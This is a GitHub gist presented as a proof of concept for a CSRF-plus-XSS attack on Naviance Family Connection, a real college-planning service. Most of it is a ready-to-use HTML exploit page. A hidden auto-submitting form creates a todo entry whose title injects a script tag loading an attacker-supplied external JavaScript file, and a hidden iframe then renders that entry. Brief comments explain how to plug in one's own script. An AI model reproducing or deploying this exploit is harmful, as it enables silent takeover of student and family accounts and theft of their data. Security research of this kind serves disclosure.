@Arinerron
Created April 11, 2017 00:20
Naviance CSRF+XSS / proof of concept
<html>
<body>
<!--
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js".
-->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://connection.naviance.com/family-connection/success-planner/goals/save' target="csrf-frame" id="csrf-form">
<input type='hidden' name='attr1' value="pwned">
<input type='hidden' name='attr2' value="pwned">
<input type='hidden' name='cid' value="1">
<input type='hidden' name='todo-priority' value='High'>
<input type='hidden' name='id' value=''>
<input type='hidden' name='task_deadline' value=''>
<input type='hidden' name='task_title' value=''>
<input type='hidden' name='title' value="&'&gt;&quot;&gt;);'&gt;&quot;&gt;&lt;/script&gt;&lt;/a&gt;&lt;script src=&quot;[jsfile]&quot;&gt;&lt;/script&gt;">
<input style="display:none" type='submit' value='submit'>
</form>
<script>
document.getElementById("csrf-form").submit();
</script>
<iframe style="display:none" src="https://connection.naviance.com/family-connection/success-planner/goals/"></iframe>
done
</body>
</html>
@Arinerron
It uses CSRF to make a new TODO note and set the name of it to an XSS payload. Then, it makes an iframe to load the page that lists the TODOs so that payload is executed.
